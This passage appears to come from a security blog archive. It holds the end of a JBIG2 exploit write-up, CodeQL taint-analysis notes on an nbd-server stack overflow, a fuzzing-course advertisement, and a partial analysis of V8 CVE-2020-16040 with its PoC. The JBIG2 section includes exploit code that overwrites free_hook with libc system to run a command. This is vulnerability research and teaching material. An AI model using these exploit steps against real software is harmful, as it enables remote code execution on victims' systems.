# 取出存放在第0个"变量"里的值（此时该值为 libc.free 的绝对地址），放到+8处
load_variable(8, 0)  # address of libc.free at +8

在获取到 free.libc 地址后，读入一个相对偏移并做个加法，经过简单几步，我们便能得到 free_hook 和 libc_system 的绝对地址：

# 把LIBC_FREE_OFFSET这个立即数的值放到+0处
mov_q_imm(0, -LIBC_FREE_OFFSET % 2 ** 64)
# 计算free_got的地址+(-libc_free_offset)，得到libc基地址，放到+8处
add_q_q(8, 0)
# 复制+8处存放的libc基地址至+0处
mov_q_q(0, 8)
# 把LIBC_FREE_HOOK_OFFSET这个立即数放到+16处
mov_q_imm(16, LIBC_FREE_HOOK_OFFSET)
# 计算出libc基地址+LIBC_FREE_HOOK_OFFSET,即free_hook的绝对地址，放到+0处
add_q_q(0, 16)
# 取出system的偏移这个立即数，放到+16处
mov_q_imm(16, LIBC_SYSTEM_OFFSET)
# 计算出system的绝对地址，放到+8处
add_q_q(8, 16)

注意，此时 pageBitmap->data 上的数据为：

1	+0: free_hook_address +8: libc_system_address

接下来便是计算 pageBitmap->data + 8 的地址，即存放着这个 libc_system_address 值的内存地址：

# 取出pagebitmap的data指针，放到+24处
mov_q_q(24, page_bitmap_buf_to_data_ptr)
# 把立即数8放到+16处
mov_q_imm(16, 8)
# 将data指针加上8，并将结果放到+24处
add_q_q(24, 16)

计算出这个内存地址的用处是什么呢？继续向下看，注意重头戏快到了：

# 取出pagebitmap的data指针的值放到第0个变量的 data 字段
rebase_variable_q(0, page_bitmap_buf_to_data_ptr)
# 取出data指针+8的值，放到第1个变量的 data 字段
rebase_variable_q(1, 24)
# 取出第0个变量的值，放到data指针处, 这一步会修改 data 指针为 free_hook_address
load_variable(page_bitmap_buf_to_data_ptr, 0)
# 取出第1个变量的值（也就是 libc_system_address），放到+0处，也就是 free_hook 基地址上的那个指针值
# 这样就完成了改写 free hook 的操作
load_variable(0, 1)

这样，此时的 free hook 便被改写成了 libc_system 的地址，接下来便是尝试执行命令。

这里再 append 一个带有待执行命令的 bitmap：

1
2
3

page0.append(
    GenericRegion(233, x=64, y=0, comb_op=CombOp.And, bitmap=Bitmap(COMMAND_TO_RUN))
)

这样当 readGenericRegionSeg 函数结束时，新创建的 bitmap（即带有命令的 bitmap）将会被 free 掉，这样就可以触发 system(command)：

void JBIG2Stream::readGenericRegionSeg(Guint segNum, GBool imm,
                                       GBool lossless, Guint length)
{
    [...];
    // read the bitmap
    bitmap = readGenericBitmap(mmr, w, h, templ, tpgdOn, gFalse,
                               NULL, atx, aty, mmr ? length - 18 : 0);

    // combine the region bitmap into the page bitmap
    if (imm)
    {
        if (pageH == 0xffffffff && y + h > curPageH)
        {
            pageBitmap->expand(y + h, pageDefPixel);
        }
        pageBitmap->combine(bitmap, x, y, extCombOp);
        // 在这里触发 system
        delete bitmap;

        // store the region bitmap
    }
    [...]
}

但有两点需要注意：

imm 必须为 true，这样才能触发 delete 操作。
创建的 GenericRegionSeg，其二维偏移 xy 映射至一维偏移后的偏移量，不能小于 64（即 8 字节）
这是因为代码中会先执行 pageBitmap->combine 再执行 delete bitmap 操作。此时的 pageBitmap->data 为 free hook address，如果执行 combine 时修改了pageBitmap->data 最低的8个字节，那么 free 时就无法调用到 libc_system，因为保存在 free_hook 上面的 libc_system 地址被破坏了。

六、参考

CodeQL 数据流分析/污点分析笔记（上篇）

2022-02-08T02:15:02.558Z

CodeQL 数据流分析/污点分析笔记（上篇）

欢迎大家关注公众号”天问记事簿”，以及加入天问之路知识星球，一起做技术分享，一起学习，happy hack。

前序

codeql关于数据流分析的基础文档可以在这里找到，本文中不多做叙述。

codeql文档里对于数据流和污点的区别描述是这样的。

在标准库中，我们区分了正常数据流和污点跟追踪。

例如，如果您正在跟踪一个不安全的对象 x（可能是一些不受信任的或潜在的恶意数据），程序中的一个步骤可能会改变它的值。因此，在 y = x + 1 这样的简单计算中，正常的数据流分析会突出使用 x，而不是 y。然而，由于 y 是从 x 派生的，它会受到不受信任或“污染”信息的影响，因此它也被污染了。分析从 x 到 y 的污点流称为污点跟踪。

污点分析在数据流分析的基础之上，额外在控制流图上建立了许多边，以此实现。本文主要就笔者对该库的分析做了记录，如有错误还请指正。

使用case

污点建模

这里以rwctf中who move my block这道题涉及的nbd-server的一个漏洞为例来简述如何使用污点分析。

首先从 accept 函数开始找起，它是整个 socket 连接的起点，通过它我们可以根据交叉引用找到处理连接的函数 handle_modern_connection：

static void
handle_modern_connection(GArray *const servers, const int sock, struct generic_conf *genconf)
{
    [...]
    net = socket_accept(sock);
    if (net < 0)
        return;
    
    if (!dontfork) {
        // 重要！：注意这里会 fork 出一个子进程来单独处理新连接
        pid = spawn_child(&commsocket);
        if (pid) {
            if (pid > 0) {
                msg(LOG_INFO, "Spawned a child process");
                g_array_append_val(childsocks, commsocket);
            }
            if (pid < 0)
                msg(LOG_ERR, "Failed to spawn a child process");
            close(net);
            return;
        }
        /* Child just continues. */
    }
    [...]
    
    // 连接协商
    client = negotiate(net, servers, genconf);
       
    [...]
       
    msg(LOG_INFO, "Starting to serve");
   
    // 开始处理
    mainloop_threaded(client);
    exit(EXIT_SUCCESS);
handler_err:
    [...]
}

需要注意的是，默认情况下对于每个连接，server 都会 fork 一个新的子进程来单独处理。这个特性相当重要，因为我们可以利用这个特性来爆破 canary 和 PIE。

该函数会调用 negotiate 函数，并创建结构体 CLIENT，将新连接的 fd 赋给该 client，之后后续使用 socket_read(client, addr, len) 来从 client（即我们这边）读取数据。

/**
 * Do the initial negotiation.
 *
 * @param net The socket we're doing the negotiation over.
 * @param servers The array of known servers.
 * @param genconf the global options (needed for accessing TLS config data)
 **/
CLIENT* negotiate(int net, GArray* servers, struct generic_conf *genconf) {
uint16_t smallflags = NBD_FLAG_FIXED_NEWSTYLE | NBD_FLAG_NO_ZEROES;
uint64_t magic;
uint32_t cflags = 0;
uint32_t opt;
    // 创建并初始化 client 结构体
CLIENT* client = g_new0(CLIENT, 1);
    // 将 socket fd 赋给 cleint
client->net = net;
client->socket_read = socket_read_notls;
client->socket_write = socket_write_notls;
client->socket_closed = socket_closed_negotiate;

assert(servers != NULL);
socket_write(client, INIT_PASSWD, 8);
magic = htonll(opts_magic);
socket_write(client, &magic, sizeof(magic));

smallflags = htons(smallflags);
socket_write(client, &smallflags, sizeof(uint16_t));
    // 从 client 读取数据
socket_read(client, &cflags, sizeof(cflags));
cflags = htonl(cflags);
    [...]
}

这样，我们可以socket_read的第二个参数（用户输入将读入到这里）作为source点，然后将看能否污点到后续调用的source_read的第三个参数（即控制读入的长度），当然也可以做其他污点。

QL source code

使用的QL如下，由于污点分析不会对未建模的函数进行进一步污点传播，所以这里通过覆盖isAdditionalTaintStep来手动构建函数参数到函数调用的额外边，另外一个需要注意的是我使用的是semmle.code.cpp.ir.dataflow.TaintTracking而不是文档里的semmle.code.cpp.dataflow.TaintTracking，前者是基于IR的新API，被建议使用，也广泛应用在codeql自己的cwe case里

大概的结构是继承TaintTracking::Configuration之后覆盖里面的方法即可。

/**
 * @kind path-problem
 */

import DataFlow::PathGraph
import cpp
import semmle.code.cpp.ir.dataflow.TaintTracking

predicate htonlCallEdge(DataFlow::Node node1, DataFlow::Node node2) {
  exists(FunctionCall fc |
    // fc.getTarget().getName() = "htonl" and
    node1.asExpr() = fc.getAnArgument() and
    node2.asExpr() = fc
  )
}

class MyDataFlowConfiguration extends TaintTracking::Configuration {
  MyDataFlowConfiguration() { this = "MyDataFlowConfiguration" }

  override predicate isSource(DataFlow::Node source) {
    exists(FunctionCall fc | fc.getArgument(1) = source.asExpr() |
      fc.getTarget().hasGlobalName("socket_read")
    )
  }

  override predicate isSink(DataFlow::Node sink) {
    // sink.asExpr().getLocation().toString().matches("%nbd-server%") and
    // sink.asExpr() instanceof BinaryArithmeticOperation
    exists(FunctionCall fc | fc.getArgument(2) = sink.asExpr() |
      fc.getTarget().hasGlobalName("socket_read")
    )
  }

  override predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) {
    htonlCallEdge(node1, node2)
  }
}

from MyDataFlowConfiguration config, DataFlow::PathNode source, DataFlow::PathNode sink
where config.hasFlowPath(source, sink)
select sink.getNode(), source, sink, ""

漏洞分析

最终发现的漏洞在handle_info里的一个栈溢出

static bool handle_info(CLIENT* client, uint32_t opt, GArray* servers, uint32_t cflags) {
uint32_t namelen, len;
char *name;
int i;
SERVER *server = NULL;
[...]
char buf[1024];
[...]

    // 1. 从远程读入 len
socket_read(client, &len, sizeof(len));
len = htonl(len);
    // 2. 从远程读入 namelen
socket_read(client, &namelen, sizeof(namelen));
namelen = htonl(namelen);
    // 3. 进入 if 分支
if(namelen > (len - 6)) {
send_reply(client, opt, NBD_REP_ERR_INVALID, -1, "An OPT_INFO request cannot be smaller than the length of the name + 6");
        // 4. 从 client 读入数据，由于 len 可控，因此可以造成栈溢出
socket_read(client, buf, len - sizeof(namelen));
}
if(namelen > 0) {
name = malloc(namelen + 1);
name[namelen] = 0;
socket_read(client, name, namelen);
} else {
name = strdup("");
}
    [...]
}

codeql污点分析源码分析

TaintTracking::Configuration定义在cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/tainttracking1/TaintTrackingImpl.qll里

它其实继承自DataFlow::Configuration，然后扩展了isAdditionalFlowStep，注意到这里先调用了this.isAdditionalTaintStep，这就是我们可以继承后覆盖的代码，引入我们自己的额外边，同时它还有一个defaultAdditionalTaintStep，这是该污点自己对数据流进行的扩展。

abstract class Configuration extends DataFlow::Configuration{
  ...
  predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }

  final override predicate isAdditionalFlowStep(DataFlow::Node node1, DataFlow::Node node2) {
    this.isAdditionalTaintStep(node1, node2) or
    defaultAdditionalTaintStep(node1, node2)
  }
...
predicate defaultAdditionalTaintStep(DataFlow::Node src, DataFlow::Node sink) {
  localAdditionalTaintStep(src, sink)
}
...
cached
predicate localAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
  operandToInstructionTaintStep(nodeFrom.asOperand(), nodeTo.asInstruction())
  or
  instructionToOperandTaintStep(nodeFrom.asInstruction(), nodeTo.asOperand())
}

operandToInstructionTaintStep

operandToInstructionTaintStep 用于把污点从参数流向指令返回值，这里做了许多连边处理：

首先是运算指令的参数连边至整个运算指令：

// Taint can flow through expressions that alter the value but preserve
  // more than one bit of it _or_ expressions that follow data through
  // pointer indirections.
  instrTo.getAnOperand() = opFrom and
  (
      instrTo instanceof ArithmeticInstruction
      or
      instrTo instanceof BitwiseInstruction
      or
      instrTo instanceof PointerArithmeticInstruction
      or
      // The `CopyInstruction` case is also present in non-taint data flow, but
      // that uses `getDef` rather than `getAnyDef`. For taint, we want flow
      // from a definition of `myStruct` to a `myStruct.myField` expression.
      instrTo instanceof CopyInstruction
  )

这里的连边操作将算数运算、位运算、指针运算 和字段使用等指令的参数连向了整个指令。

例如如果我们污点到了len + 1的len，那么它将把污点从len传播到len + 1这个AddExpr中。

其次是一元运算指令，这里排除了字段取地址指令

// Unary instructions tend to preserve enough information in practice that we
// want taint to flow through.
// The exception is `FieldAddressInstruction`. Together with the rules below for
// `LoadInstruction`s and `ChiInstruction`s, flow through `FieldAddressInstruction`
// could cause flow into one field to come out an unrelated field.
// This would happen across function boundaries, where the IR would not be able to
// match loads to stores.
instrTo.(UnaryInstruction).getUnaryOperand() = opFrom and
(
  not instrTo instanceof FieldAddressInstruction
  or
  instrTo.(FieldAddressInstruction).getField().getDeclaringType() instanceof Union
)

排除字段取地址指令的原因正如注释所说，流过 FieldAddressInstruction 可能会导致污点流从某个字段流入，从另一个不相关的字段流出。

此外是为其他已经建模好的函数进行污点传递，其中污点从 callInput 传播到 callOutput。

1	modeledTaintStep(opFrom, instrTo)

污点分析库会额外对库函数建模，对很多非常常用的函数建立额外边。这种建模是通过派生 TaintFunction 类，重写 hasTaintFlow 函数来实现的。我们可以全局搜索 TaintFunction 字符串，找到所有建模好的函数。以下是其中某个函数的建模实现：

/**
 * A function that is pure, that is, its evaluation is guaranteed to be
 * side-effect free. Excludes functions modeled by `PureStrFunction` and `PureMemFunction`.
 */
private class PureFunction extends TaintFunction, SideEffectFunction {
  PureFunction() { this.hasGlobalOrStdOrBslName(["abs", "labs"]) }

  override predicate hasTaintFlow(FunctionInput input, FunctionOutput output) {
    exists(ParameterIndex i |
      input.isParameter(i) and
      exists(this.getParameter(i))
    ) and
    output.isReturnValue()
  }

  override predicate hasOnlySpecificReadSideEffects() { any() }

  override predicate hasOnlySpecificWriteSideEffects() { any() }
}

污点分析库对函数 abs 进行建模，重写 hasTaintFlow函数，将该函数的输入参数与函数的返回值相连。这样，如果该函数的参数被污染，那么该函数的返回值也将被视为污染。

数据流分析库同样会对一些库函数进行建模，但不同的是，所建模函数的数量并没有污点分析那么多，同时连接额外边的侧重点也不一样，以 gets 函数为例，以下是它的建模实现：

/**
 * The standard functions `gets` and `fgets`.
 */
private class GetsFunction extends DataFlowFunction, TaintFunction, ArrayFunction, AliasFunction,
  SideEffectFunction, RemoteFlowSourceFunction {
  GetsFunction() {
    // gets(str)
    // fgets(str, num, stream)
    // fgetws(wstr, num, stream)
    this.hasGlobalOrStdOrBslName(["gets", "fgets", "fgetws"])
  }

  override predicate hasDataFlow(FunctionInput input, FunctionOutput output) {
    input.isParameter(0) and
    output.isReturnValue()
  }

  override predicate hasTaintFlow(FunctionInput input, FunctionOutput output) {
    input.isParameter(2) and
    output.isParameterDeref(0)
  }

  override predicate parameterNeverEscapes(int index) { index = 2 }

  override predicate parameterEscapesOnlyViaReturn(int index) { index = 0 }

  override predicate parameterIsAlwaysReturned(int index) { index = 0 }

  override predicate hasOnlySpecificReadSideEffects() { any() }

  override predicate hasOnlySpecificWriteSideEffects() { any() }

  override predicate hasSpecificWriteSideEffect(ParameterIndex i, boolean buffer, boolean mustWrite) {
    i = 0 and
    buffer = true and
    mustWrite = true
  }

  override predicate hasRemoteFlowSource(FunctionOutput output, string description) {
    output.isParameterDeref(0) and
    description = "String read by " + this.getName()
  }

  override predicate hasArrayWithVariableSize(int bufParam, int countParam) {
    not this.hasName("gets") and
    bufParam = 0 and
    countParam = 1
  }

  override predicate hasArrayWithUnknownSize(int bufParam) {
    this.hasName("gets") and
    bufParam = 0
  }

  override predicate hasArrayOutput(int bufParam) { bufParam = 0 }
}

注意到 hasDataFlow 的实现是将传入的第一个 buf 参数与返回值连接（buf参数的值会影响到 gets 的返回值）。而 hasTaintFlow 是将 fgets 等的数据来源与 buf 连接（数据来源会污染 buf 中的数据）。

除此之外还涉及到ReadSideEffectInstruction/InitializeIndirectionInstruction等IR进行了额外的连边，但是笔者暂未找到合适的codeql IR文档，留待后文，但我初步推测应该和内存初始化和指针解引用等都有关系。

总结

目前看codeql的c/c++污点分析还是有局限性的，首先它并没有对c++的语法特性做适配，目前看只是字段访问的时候有额外的处理。
此外受限于符号支持，它并不能完全实现跨函数追踪，例如对于大部分标准库函数它目前都只能自己去建模，无法自动化的分析和追踪，但这不是ql的问题，是插桩的问题，这部分我在想通过静态链接能否有改善。

目前我们在自己做审计的时候，如果需要做跨函数的追踪，还是需要像我代码里一样去手动连边，这个连边可以是保守的也可以是粗放的，例如我的实现就是，如果污点传入的函数参数，就传播到函数调用。

此外根据我在做chrome QL审计的经验，可以参考Chrome Library来补一些拷贝构造函数，智能指针，虚函数调用，以及c++容器相关的边。

这些也是留待后文。

sakuraのfuzzing lab培训

2021-11-14T15:41:41.196Z

sakuraのfuzzing lab培训

因为Fuzzing Lab的反响意外的还好，感谢大家，为了让大家更好的选择自己想学的内容，为大家省钱，我修订了Fuzzing Lab的内容。

主讲人

@sakura，二进制安全研究员、Fuzzing爱好者、浏览器bug hunter，获得过谷歌/苹果高危漏洞致谢，我的漏洞列表: https://eternalsakura13.com/buglist

加入Fuzzing Lab，你将获得：

除第一个月的Fuzz基础外，我将在后续每个月按专题推出技术内容，例如在这个月主讲浏览器Fuzz，下个月主讲内核Fuzz等，让每个人能听到自己更感兴趣的专题内容，避免无用付费，你甚至可以单独购买Fuzz基础内容
学习形式: 每周末的技术直播，讲解各类Fuzz原理，不同目标的合适的解决方案；提供学习路径和课后作业，动手调试，尝试挖掘。
和业内资深fuzz安全研究员近距离交流的机会，享有每周的直播分享、头脑风暴、技术答疑，从原理上掌握Fuzz技术，并应用在漏洞挖掘场景中。

常见问题:

问1:我适合学习Fuzzing Lab吗?
答1:如果你是安全从业者、学生，开发人员等，对c/c++系代码有一定了解，愿意花时间尝试，一定能学有所获。

问2:我能只买Fuzz基础/浏览器等某个月的具体专题的内容吗?
答2:可以，为了避免无用消费，大家不必全都学习。我鼓励大家更多的尝试不同的方向，而且因为内容是持续积累的，所以任何时候想学习之前的专题，都可以再补票，不用担心错过。

订阅费用与付费方法:

Fuzzing Lab现价: 500元/每个专题/月，如果是星球成员，从星球群里加我并备注fuzzinglab可享首月5折优惠。
因为内容是持续积累的，所以如果现在你想学习内核Fuzz，我也还没有备课到，我每个月讲一个专题，并在这个帖子和我的博客长期更新目录，随时可以选择学习某个专题的内容。
课程购买链接

专题1: Fuzz基础
https://m.weishi100.com/mweb/series/?id=1326479

专题2: 浏览器Fuzz-1
https://m.weishi100.com/mweb/series/?id=1326477

我的愿景:

我想输出更多东西，想让更多人进入二进制安全这个大方向，能够和大家一起成长，一起进步，不妄自菲薄，成为最好的自己。

chrome exploitation解读:CVE-2020-16040漏洞分析与利用

2021-06-22T03:39:03.062Z

前言

本篇主要是对zer0con2021上chrome exploitation议题v8部分的解读。

这个漏洞发生在Simplified Lowering phase的VisitSpeculativeIntegerAdditiveOp函数中，该函数是用来处理SpeculativeSafeIntegerAdd/SpeculativeSafeIntegerSubtract节点，对其重新计算类型并将其转化或者降级到更底层的IR。
这个函数非常有趣，据我所知它已经出了三个可以RCE的漏洞了

Simplified lowing phase和Root Cause

反向数据流分析，传播truncation，并设置restriction_type
正向数据流分析，重新计算类型，并设置representation。
降级(lower)节点或者插入转换(conversion)节点

重要的数据结构和函数

NodeInfo，记录数据流分析中节点的各种类型信息，主要包括truncation(指明该节点在使用的时候的截断信息)，restriction_type(在truncation传播阶段设置它的值，用于在retype的时候设置feedback_type)，feedback_type（用于在Retype phase重新计算type信息），representation（节点retype完成之后最终的表示类型，可以用于指明应该如何lower到更具体的节点，是否需要Convert）等。

// Information for each node tracked during the fixpoint.
class NodeInfo final {
 public:
  // Adds new use to the node. Returns true if something has changed
  // and the node has to be requeued.
  bool AddUse(UseInfo info) {
    Truncation old_truncation = truncation_;
    truncation_ = Truncation::Generalize(truncation_, info.truncation());
    return truncation_ != old_truncation;
  }

  void set_queued() { state_ = kQueued; }
  void set_visited() { state_ = kVisited; }
  void set_pushed() { state_ = kPushed; }
  void reset_state() { state_ = kUnvisited; }
  bool visited() const { return state_ == kVisited; }
  bool queued() const { return state_ == kQueued; }
  bool pushed() const { return state_ == kPushed; }
  bool unvisited() const { return state_ == kUnvisited; }
  Truncation truncation() const { return truncation_; }
  void set_output(MachineRepresentation output) { representation_ = output; }

  MachineRepresentation representation() const { return representation_; }

  // Helpers for feedback typing.
  void set_feedback_type(Type type) { feedback_type_ = type; }
  Type feedback_type() const { return feedback_type_; }
  void set_weakened() { weakened_ = true; }
  bool weakened() const { return weakened_; }
  void set_restriction_type(Type type) { restriction_type_ = type; }
  Type restriction_type() const { return restriction_type_; }

 private:
  enum State : uint8_t { kUnvisited, kPushed, kVisited, kQueued };
  State state_ = kUnvisited;
  MachineRepresentation representation_ =
      MachineRepresentation::kNone;             // Output representation.
  Truncation truncation_ = Truncation::None();  // Information about uses.

  Type restriction_type_ = Type::Any();
  Type feedback_type_;
  bool weakened_ = false;
};

ProcessInput
这是一个模板函数，根据不同的phase调用不同的实现，对于truncation propagate phase，它将直接调用EnqueueInput。

template <>
void RepresentationSelector::ProcessInput(Node* node, int index,
                                                     UseInfo use) {
  DCHECK_IMPLIES(use.type_check() != TypeCheckKind::kNone,
                 !node->op()->HasProperty(Operator::kNoDeopt) &&
                     node->op()->EffectInputCount() > 0);
  EnqueueInput(node, index, use);
}

template <>
void RepresentationSelector::ProcessInput(Node* node, int index,
                                                  UseInfo use) {
  DCHECK_IMPLIES(use.type_check() != TypeCheckKind::kNone,
                 !node->op()->HasProperty(Operator::kNoDeopt) &&
                     node->op()->EffectInputCount() > 0);
}

template <>
void RepresentationSelector::ProcessInput(Node* node, int index,
                                                 UseInfo use) {
  DCHECK_IMPLIES(use.type_check() != TypeCheckKind::kNone,
                 !node->op()->HasProperty(Operator::kNoDeopt) &&
                     node->op()->EffectInputCount() > 0);
  ConvertInput(node, index, use);
}

...
 // Converts input {index} of {node} according to given UseInfo {use},
  // assuming the type of the input is {input_type}. If {input_type} is null,
  // it takes the input from the input node {TypeOf(node->InputAt(index))}.
  void ConvertInput(Node* node, int index, UseInfo use,
                    Type input_type = Type::Invalid()) {
    // In the change phase, insert a change before the use if necessary.
    if (use.representation() == MachineRepresentation::kNone)
      return;  // No input requirement on the use.
    Node* input = node->InputAt(index);
    DCHECK_NOT_NULL(input);
    NodeInfo* input_info = GetInfo(input);
    MachineRepresentation input_rep = input_info->representation();
    if (input_rep != use.representation() ||
        use.type_check() != TypeCheckKind::kNone) {
      // Output representation doesn't match usage.
      TRACE("  change: #%d:%s(@%d #%d:%s) ", node->id(), node->op()->mnemonic(),
            index, input->id(), input->op()->mnemonic());
      TRACE("from %s to %s:%s\n",
            MachineReprToString(input_info->representation()),
            MachineReprToString(use.representation()),
            use.truncation().description());
      if (input_type.IsInvalid()) {
        input_type = TypeOf(input);
      }
      Node* n = changer_->GetRepresentationFor(input, input_rep, input_type,
                                               node, use);
      node->ReplaceInput(index, n);
    }
  }

EnqueueInput
这个函数先从全局数组里取出node的指定index的输入节点对应的NodeInfo信息，然后调用AddUse来更新info的truncation_字段，从而将truncation反向传播。

// Enqueue {use_node}'s {index} input if the {use_info} contains new information
// for that input node.
template <>
void RepresentationSelector::EnqueueInput(Node* use_node, int index,
                                                     UseInfo use_info) {
  Node* node = use_node->InputAt(index);
  NodeInfo* info = GetInfo(node);
#ifdef DEBUG
  // Check monotonicity of input requirements.
  node_input_use_infos_[use_node->id()].SetAndCheckInput(use_node, index,
                                                         use_info);
#endif  // DEBUG
  if (info->unvisited()) {
    info->AddUse(use_info);
    TRACE("  initial #%i: %s\n", node->id(), info->truncation().description());
    return;
  }
  TRACE("   queue #%i?: %s\n", node->id(), info->truncation().description());
  if (info->AddUse(use_info)) {
    // New usage information for the node is available.
    if (!info->queued()) {
      DCHECK(info->visited());
      revisit_queue_.push(node);
      info->set_queued();
      TRACE("   added: %s\n", info->truncation().description());
    } else {
      TRACE(" inqueue: %s\n", info->truncation().description());
    }
  }
}
    bool AddUse(UseInfo info) {
      Truncation old_truncation = truncation_;
      truncation_ = Truncation::Generalize(truncation_, info.truncation());
      return truncation_ != old_truncation;
    }

SetOutput
这个函数也是模板函数，根据不同phase调用不同的偏特化实现

对于truncation propagate phase，它将更新节点对应的nodeinfo的restriction_type_，并用于后续的retype phase上。

对于retype phase，它将更新节点的representation表示。

template <>
void RepresentationSelector::SetOutput(
    Node* node, MachineRepresentation representation, Type restriction_type) {
  NodeInfo* const info = GetInfo(node);
  info->set_restriction_type(restriction_type);
}

template <>
void RepresentationSelector::SetOutput(
    Node* node, MachineRepresentation representation, Type restriction_type) {
  NodeInfo* const info = GetInfo(node);
  DCHECK(restriction_type.Is(info->restriction_type()));
  info->set_output(representation);
}

template <>
void RepresentationSelector::SetOutput(
    Node* node, MachineRepresentation representation, Type restriction_type) {
  NodeInfo* const info = GetInfo(node);
  DCHECK_EQ(info->representation(), representation);
  DCHECK(restriction_type.Is(info->restriction_type()));
  USE(info);
}

PoC

Issue
https://bugs.chromium.org/p/chromium/issues/detail?id=1150649

// test/mjsunit/compiler/regress-1150649.js 
function foo(a) {
    var y = 0x7fffffff;
    
    if (a == NaN) y = NaN;
    
    if (a) y = -1;
    const z = (y + 1)|0;
    return z < 0; 
}
%PrepareFunctionForOptimization(foo); 
assertFalse(foo(true)); 
%OptimizeFunctionOnNextCall(foo); 
assertTrue(foo(false)); // return False, FAILURE!!!
function foo(a) {
  var y = 0x7fffffff; // 2^31 - 1
  if (a == NaN) y = NaN; // Widen the static type of y (this condition never holds).
  if (a) y = -1;// The next condition holds only in the warmup run. It leads to Smi (SignedSmall) feedback being collected for the addition below. 
  let z = (y + 1) | 0;
  return z < 0;
}
%PrepareFunctionForOptimization(foo);
foo(true);
%OptimizeFunctionOnNextCall(foo);
print(foo(false));

经过Typer phase之后:

y:
(NaN | Range(-1, 0x7fffffff))
y + 1:
Range(0, 0x80000000)
(y + 1) | 0:
Range(-0x80000000, 0x7fffffff)

若是正常的解释执行，则const z = (y + 1)|0;将计算出-0x80000000，其小于0显然为true，但在有漏洞的情况下却返回false。

truncation propagation

通过./d8 --allow-natives-syntax --trace-representation poc.js可以完整的trace这三个阶段。

首先对于truncation propagation，可以看出在反向遍历节点的时候，在visit NumberLessThan的时候，将其输入节点#47的truncation由TruncationKind::kNone(no-value-use)更新到TruncationKind::kWord32(truncate-to-word32)，代表它在使用的时候会被截断到word32。

1
2
3

visit #57: NumberLessThan (trunc: no-truncation (but distinguish zeros))
  queue #47?: no-value-use
inqueue: truncate-to-word32

在处理y+1的时候,最终会调用到VisitBinop，其将左值和右值输入节点启发式的传播其truncation信息，并将SpeculativeSafeIntegerAdd对应的nodeinfo里的restriction_type字段更新到Type::Signed32

1
2
3

visit #45: SpeculativeSafeIntegerAdd (trunc: truncate-to-word32)
 initial #41: no-truncation (but identify zeros)
 initial #44: no-truncation (but identify zeros)

void VisitSpeculativeIntegerAdditiveOp(Node* node, Truncation truncation,SimplifiedLowering* lowering) {
    ...
    VisitBinop(..., Type::Signed32());
    ...

void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use, MachineRepresentation output, Type restriction_type = Type::Any()) {
   DCHECK_EQ(2, node->op()->ValueInputCount());
   ProcessInput(node, 0, left_use);
   ProcessInput(node, 1, right_use);
   for (int i = 2; i < node->InputCount(); i++) {
     EnqueueInput(node, i);
   }
   SetOutput(node, output, restriction_type);
 }

Retype phase

Retype phase进行正向数据流分析，从Start节点开始，对每个节点UpdateFeedbackType更新类型，并将更新后的类型向前传播。

#45:SpeculativeSafeIntegerAdd[SignedSmall](#41:Phi, #44:NumberConstant, #42:Checkpoint, #38:Merge)  
[Static type: Range(0, 2147483648), 
Feedback type: Range(0, 2147483647)]
 visit #45: SpeculativeSafeIntegerAdd
  ==> output kRepWord32

Type FeedbackTypeOf(Node* node) {
    Type type = GetInfo(node)->feedback_type();
    return type.IsInvalid() ? Type::None() : type;
}
...
bool UpdateFeedbackType(Node* node) {
...
    Type input0_type;
    if (node->InputCount() > 0) input0_type = FeedbackTypeOf(node->InputAt(0));
    Type input1_type;
    if (node->InputCount() > 1) input1_type = FeedbackTypeOf(node->InputAt(1));
    ...
    #define DECLARE_CASE(Name)                                               \
    case IrOpcode::k##Name: {                                              \
        new_type = Type::Intersect(op_typer_.Name(input0_type, input1_type), \
                                info->restriction_type(), graph_zone());  \
        break;                                                               \
    }
    SIMPLIFIED_SPECULATIVE_NUMBER_BINOP_LIST(DECLARE_CASE)
    SIMPLIFIED_SPECULATIVE_BIGINT_BINOP_LIST(DECLARE_CASE)
#undef DECLARE_CASE
...
    GetInfo(node)->set_feedback_type(new_type);
...
}

#define SIMPLIFIED_SPECULATIVE_NUMBER_BINOP_LIST(V) \
....
  V(SpeculativeNumberBitwiseOr)  
  V(SpeculativeSafeIntegerAdd)                      \
  V(SpeculativeSafeIntegerSubtract)

首先对左值和右值输入节点调用FeedbackTypeOf函数，这个函数会去确定该节点对应的nodeinfo上是否有feedback字段被设置，如果有则代表该输入节点的类型在retype的时候被更新了，需要取该类型作为实际的类型信息，否则代表没有更新，和之前typer阶段分析的一致，直接取原本的type即可，最终得到input0_type和input1_type。

这个宏看上去很不好理解，但其实意思就是对于
SpeculativeSafeIntegerAdd节点，先根据input0_type和input1_type，重新调用SpeculativeSafeIntegerAdd运算符的type函数，计算出一个类型，其应该是Range(0, 2147483648)。

然后将这个结果和restriction_type即Signed32取交集，而Signed32的范围应该是(-2147483648,2147483647)，最终得到Feedback type是Range(0, 2147483647)，并将这个结果更新到节点对于nodeinfo的feedback_type字段上。

SpeculativeNumberBitwiseOr同理，由于SpeculativeSafeIntegerAdd的类型作为input0_type已经被更新了，所以调用SpeculativeNumberBitwiseOr的type函数将计算出一个新的类型，作为Feedback type传播下去。

#47:SpeculativeNumberBitwiseOr[SignedSmall](#45:SpeculativeSafeIntegerAdd, #46:NumberConstant, #45:SpeculativeSafeIntegerAdd, #38:Merge)  
[Static type: Range(-2147483648, 2147483647), 
Feedback type: Range(0, 2147483647)]
 visit #47: SpeculativeNumberBitwiseOr
  ==> output kRepWord32

Retype phase除了调用UpdateFeedbackType更新信息，还会调用VisitNode函数设置节点的respresentation，但这和这个漏洞无关，略过不表。

Lower phase

现在，每个节点都已经和它的使用信息(truncation)和output representation关联了。

最后将反向的遍历所有节点，进行lower

将节点本身lower到更具体的节点（通过DeferReplacement）
当该节点的的output representation与此输入的预期使用信息不匹配时，对节点进行转换（插入ConvertInput），比如对于一个representation是kSigned的node1，若其use节点node2会将其truncation到kWord64，则将会插入ConvertInput函数对该节点进行转换。

于是对于poc里的z < 0,由于z的类型已经被更新到了(0, 2147483647)，这个范围显然是在Unsigned32OrMinusZero里的，所以满足第一个if判断。

于是最终将NumberLessThan节点给lower到了Uint32Op。
但实际上z的值是|0x80000000|，其被当成uint32解析的话就是+0x80000000，这个值显然大于0，所以出现了和之前解释执行时候不一样的结果false。

case IrOpcode::kNumberLessThan:
case IrOpcode::kNumberLessThanOrEqual: {
